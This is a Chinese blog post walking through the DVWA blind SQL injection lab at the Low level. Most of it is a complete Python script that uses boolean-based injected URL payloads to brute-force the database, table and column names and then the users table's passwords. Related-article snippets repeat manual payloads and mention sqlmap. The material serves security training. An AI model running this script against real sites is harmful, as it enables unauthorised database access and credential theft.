SQL Injection (Blind)

最新推荐文章于 2024-09-11 15:12:03 发布
最新推荐文章于 2024-09-11 15:12:03 发布
阅读量356 收藏
点赞数 9
分类专栏: DVWA 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78637299/article/details/139273407
版权

一.Low篇;

1.进入DVWA;

(账号:admin 密码:password)

2.将等级改为Low;

 进入SQL Injection(Blind),分别输入1,1',a分别查看结果;

经过尝试可知其为数字型注入;

根据源码

3.使用脚本进行爆破;

这里需要学习python,可以慢慢学习,先借用大佬的脚步进行爆破

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

import requests

# 脚本里用到的参数
# databaseLen   库名长度
# databse_name  库名
# tableNum      表的数量
# tableLen      表名长度
# table_name    表名

s = requests.Session()

url = '--------------------------'#这里需要填写自己的

payloads = 'abcdefghijklmnopqrstuvwxyz1234567890_'
# 这里为节约时间只包含小写字母与数字,实际可能还有大写字母与符号

headers = {'Cookie': 'PHPSESSID=5m3soj7e5vvd2g9ffci0vb2fm6; security=low'}
# 因为dvwa需要登陆,所以要在头部里加入cookie
# 可以使用Burp
# 1.先爆破库名的长度,以提高后续循环的效率,也可以不爆破长度,直接爆破名称(只要循环数大于长度)
for j in range(1, 50):
    databaseLen_payload = '?id=1\' and length(database())=' + str(j) + ' %23&Submit=Submit#'
    # 所有payload里的注释#要用url编码表示,因为这是直接添加在url里的
    if 'User ID exists in the database.' in s.get(url + databaseLen_payload, headers=headers).text:
        databaseLen = j
        break
print('database_lenth: ' + str(databaseLen))

# 2.爆库名
databse_name = ''
for j in range(1, databaseLen + 1):
    for i in payloads:
        databse_payload = '?id=1\' and substr(database(),' + str(j) + ',1)=\'' + str(i) + '\' %23&Submit=Submit#'
        #print(databse_payload)
        if 'User ID exists in the database.' in s.get(url + databse_payload, headers=headers).text:
            databse_name += i
            break

print('database_name: ' + databse_name)

# 3.爆破表的个数
for j in range(1, 50):
    tableNum_payload = '?id=1\' and (select count(table_name) from information_schema.tables where table_schema=database())=' + str(
        j) + ' %23&Submit=Submit#'
    if 'User ID exists in the database.' in s.get(url + tableNum_payload, headers=headers).text:
        tableNum = j
        break
print('tableNum: ' + str(tableNum))

# 4.爆出所有的表名
# (1)爆出各个表名的长度
for j in range(0, tableNum):
    table_name = ''
    for i in range(1, 50):
        tableLen_payload = '?id=1\' and length(substr((select table_name from information_schema.tables where table_schema=database() limit ' + str(
            j) + ',1),1))=' + str(i) + ' %23&Submit=Submit#'
        # 用法substr('This is a test', 6) 返回'is a test'
        if 'User ID exists in the database.' in s.get(url + tableLen_payload, headers=headers).text:
            tableLen = i
            print('table' + str(j + 1) + '_length: ' + str(tableLen))

            # (2)内部循环爆破每个表的表名
            for m in range(1, tableLen + 1):
                for n in payloads:  # i在上个循环用过了
                    table_payload = '?id=1\' and substr((select table_name from information_schema.tables where table_schema=database() limit ' + str(
                        j) + ',1),' + str(m) + ',1)=\'' + str(n) + '\' %23&Submit=Submit#'
                    if 'User ID exists in the database.' in s.get(url + table_payload, headers=headers).text:
                        table_name += n
                        break
            print('table' + str(j + 1) + '_name: ' + table_name)
columnNum = 0
for j in range(50):
    #选取users表进行爆破
    columnNum_payload = '?id=1\' and (select count(column_name) from information_schema.columns where table_name=\'users\' AND TABLE_SCHEMA =\'dvwa\' )=' + str(
        j) + ' %23&Submit=Submit#'
    #print(columnNum_payload)
    if 'User ID exists in the database.' in s.get(url + columnNum_payload, headers=headers).text:
        columnNum = j
        break
print('columnNum: ' + str(columnNum))

# 2.爆出每个字段名的长度
for j in range(0, columnNum):
    column_name = ''
    for i in range(1, 50):
        columnLen_payload = '?id=1\' and length(substr((select column_name from information_schema.columns where table_name=\'users\' limit ' + str(
            j) + ',1),1))=' + str(i) + ' %23&Submit=Submit#'
        if 'User ID exists in the database.' in s.get(url + columnLen_payload, headers=headers).text:
            columnLen = i
            print('column' + str(j + 1) + '_length: ' + str(columnLen))

            # (2)内部循环爆破每个表的表名
            for m in range(1, columnLen + 1):
                for n in payloads:  # i在上个循环用过了
                    column_payload = '?id=1\' and substr((select column_name from information_schema.columns where table_name=\'users\' limit ' + str(
                        j) + ',1),' + str(m) + ',1)=\'' + str(n) + '\' %23&Submit=Submit#'
                    if 'User ID exists in the database.' in s.get(url + column_payload, headers=headers).text:
                        column_name += n
                        break
            print('column' + str(j + 1) + '_name: ' + column_name)
rowNum = 0
for j in range(50):
    rowNum_payload = '?id=1\' and (select count(*) from users)='+str(j)+' %23&Submit=Submit#'
    if 'User ID exists in the database.' in s.get(url+rowNum_payload, headers=headers).text:
        rowNum = j
print("row_number: "+str(rowNum))


# 先爆每个字段值长度,以便控制循环,提高效率,也可省略此步骤,但要保证循环大于字段长度
for j in range(0,rowNum+1):

    rowContent = ''
    for i in range(50):
       #rowLen_payload = '?id=1\' and length(substr(select flag from flagishere limit '+str(j)+',1),1)='+str(i)+' %23&Submit=Submit#'
        rowLen_payload = '?id=1\' and length(substr((select password from users limit '+str(j)+',1),1))='+str(i)+' %23&Submit=Submit#'
        if 'User ID exists in the database.' in s.get(url+rowLen_payload, headers=headers).text:
            rowLen = i
            print('row'+str(j+1)+'_length: '+str(rowLen))
            #爆出个字段内容
            for m in range(1,rowLen+1):
                for n in payloads:
                    rowContent_payload = '?id=1\' and substr((select password from users limit '+str(j)+',1),'+str(m)+',1)=\''+str(n)+'\' %23&Submit=Submit#'
                    if 'User ID exists in the database.' in s.get(url+rowContent_payload, headers=headers).text:
                        rowContent += n
                        break
            print('row'+str(j+1)+'_content: '+rowContent)

在终端运行即可获取到库名,表名,列名等;

左小生
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【DVWA】--- 八、sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 737
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA之SQL Injection (Blind)
qq_39682037的博客
03-20 2198
盲注 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Security Level: low 测试流程 输入 1 输入 1 and 1=1 输入1’ 输入 1’ and 1=1 输入 1’ and 1=2 输入1’ and length(database())=1 输入1’ and leng...
DVWA 之 SQL Injection Blind(SQL盲注)
RexHa的博客
10-04 2331
DVWA sql盲注
DVWA SQL Injection Blind 利用SQLMap注入
Senimo
03-18 1057
DVWA SQL Injection Blind 利用SQLMap注入LowMediumHigh Low 输入数据1,得到回显: 只给出用户是否存在的回显,而且是GET传参,在抓取数据包时,发现还存在有Cookie中的传参: 将文件保存到本地,并在Cookie中的id=1后面加上字符*: 尝试直接使用SQLMap: sqlmap -r /root/桌面/1.txt 得到回显: 完成对Low级别的注入 Medium Medium级别需要下拉选择参数提交,使用BurpSuite抓取数据包: 将数
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1299
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
Sql Injection (Blind)
qq_45521281的博客
04-14 1810
SQL Injection (Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 基于页面响应方式的盲注分类 基于布尔的盲注: 即可以根据...
SQL Injection Blind(Low)
七月_的博客
10-21 225
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。
dvwa之sql injection(blind)
Alsn86的博客
01-27 873
dvwa之 sql injection(blind) sql injection(blind)之low等级 1.判断出是字符型 2.看当前数据库名字长度1’ and length(database())=4;# 显示正确 所以数据库名长度为4 3.判断数据库名字为dvwa 1’ and substr(database(),1,1)=‘d’;# 判断出数据库名字第一个字符为’d’ 1’ and substr(database(),2,1)=‘d’;# 判断出数据库名字第一个字符为’v’ 1’ and
SQL Injection(Blind)(SQL注入之盲注)
qq_59706867的博客
07-14 1385
SQL Injection(Blind),SQL盲注,相比于常规的SQL注入,他不会将返回具体的数据信息或语法信息,只会将服务器包装后的信息返回到页面中。
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2831
DVWA------SQL Injection (Blind)(SQL盲注)
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
MySQL盲注(Blind SQL Injection)是一种特殊类型的SQL注入攻击,攻击者无法直接看到数据库的响应,而是通过观察应用程序的间接行为来判断是否存在漏洞或获取数据。这种攻击方式通常发生在目标系统对错误信息进行了...
mysql 猜解字段,DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析
weixin_42610671的博客
03-17 690
一、DVWA-SQL Injection(Blind)测试分析SQL盲注 VS 普通SQL注入:普通SQL注入SQL盲注1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等2.一般在页面上直接就会显示执行sql语句的结果1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注...
被低估的SQL
weixin_61431494的博客
09-03 1585
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQL(结构性查询语句)
2301_78693337的博客
09-11 237
以上就是今天要讲的内容,本文介绍了基础的SQL语法使用,而sql还提供了大量能使我们快速便捷地处理数据的函数和方法等着我们探索。
sqlserver常用的sql命令
2301_76664379的博客
09-11 536
备注:D 表示全备份,i 表示差异备份,L 表示日志备份。
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1353
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
SQL创建索引加快查询速度的方法
最新发布
大IT职男日志
09-11 258
进行SQL查询时候,如果数据庞大,查询速度会变得很慢,需要用到索引来加快速度。方法如下:一、创建索引方法1、使用CREATE INDEX 语句创建索引 查看索引:SHOW INDEX FROM 表名;创建索引:CREATE [UNIQUE | FULLTEXT] INDEX 索引名 ON 表名 (表字段,...) ;加参数 UNIQUE 增加唯一键索引,FULLTEXT 全文索引 不加普通索引;前缀索引:create index 索引名 ON 表名 (字段(前n个字符));删除索引:DROP IN
Spring AOP
2301_79288225的博客
09-11 624
什么是⾯向特定⽅法编程呢?⽐如上个章节学习的"登录校验", 就是⼀类特定问题. 登录校验拦截器, 就是对"登录校验"这类问题的统⼀处理. 所以, 拦截器也是AOP的⼀种应⽤. AOP是⼀种思想, 拦截器是AOP思想的⼀种实现. Spring框架实现了这种思想, 提供了拦截器技术的相关接⼝.当我们在⼀个项⽬中, 定义了多个切⾯类时, 并且这些切⾯类的多个切⼊点都匹配到了同⼀个⽬标⽅法. 当⽬标⽅法运⾏的时候, 这些切⾯类中的通知⽅法都会执⾏, 那么这⼏个通知⽅法的执⾏顺序是什么样的呢?
12,sql 中分组查询
m0_61265297的博客
09-06 442
5.查询各部门下,人数超过两人的岗位有哪些,显示部门编号、岗位名称。1.统计除10号部门的其他部门中,哪些部门的最高薪资达到三千。2.查询平均薪资超过1800的部门,显示部门编号及平均薪资。-- 2. 查找订单总金额超过 50.00 的客户。3.查询薪资合计超过5000的岗位及其平均薪资。COUNT(列名 | * |数字) --计数。4.查询部门人数超过4人的部门编号及薪资合计。MIN(列名) --求最小。MAX(列名) --求最大。sum(列名) --求和。AVG(列名) --
SQL Blind Injection
06-11
SQL Blind Injection(盲注)是一种利用目标应用程序的响应时间、错误信息、DNS 解析等特征来判断注入是否成功的攻击方式。它与普通的 SQL 注入攻击不同的是,它不需要直接获取到数据库的信息,而是通过构造特定的 SQL 语句,利用目标应用程序的响应特征来判断注入是否成功。 SQL Blind Injection 通常分为两种类型:基于布尔的盲注和基于时间的盲注。基于布尔的盲注是利用布尔运算的结果来推断数据库信息,例如利用“1=1”与“1=2”来判断某个条件是否成立。基于时间的盲注则是利用目标应用程序的响应时间来判断数据库信息,例如通过在注入语句中加入 sleep() 函数来延长响应时间,从而推断出信息。 为了防止 SQL Blind Injection 攻击,应用程序开发者需要对用户输入进行严格的验证和过滤,避免将用户输入作为 SQL 语句的一部分直接拼接到 SQL 查询语句中。同时,数据库管理员也需要对数据库进行良好的权限管理和访问控制,避免攻击者通过 SQL 注入攻击获取到敏感数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值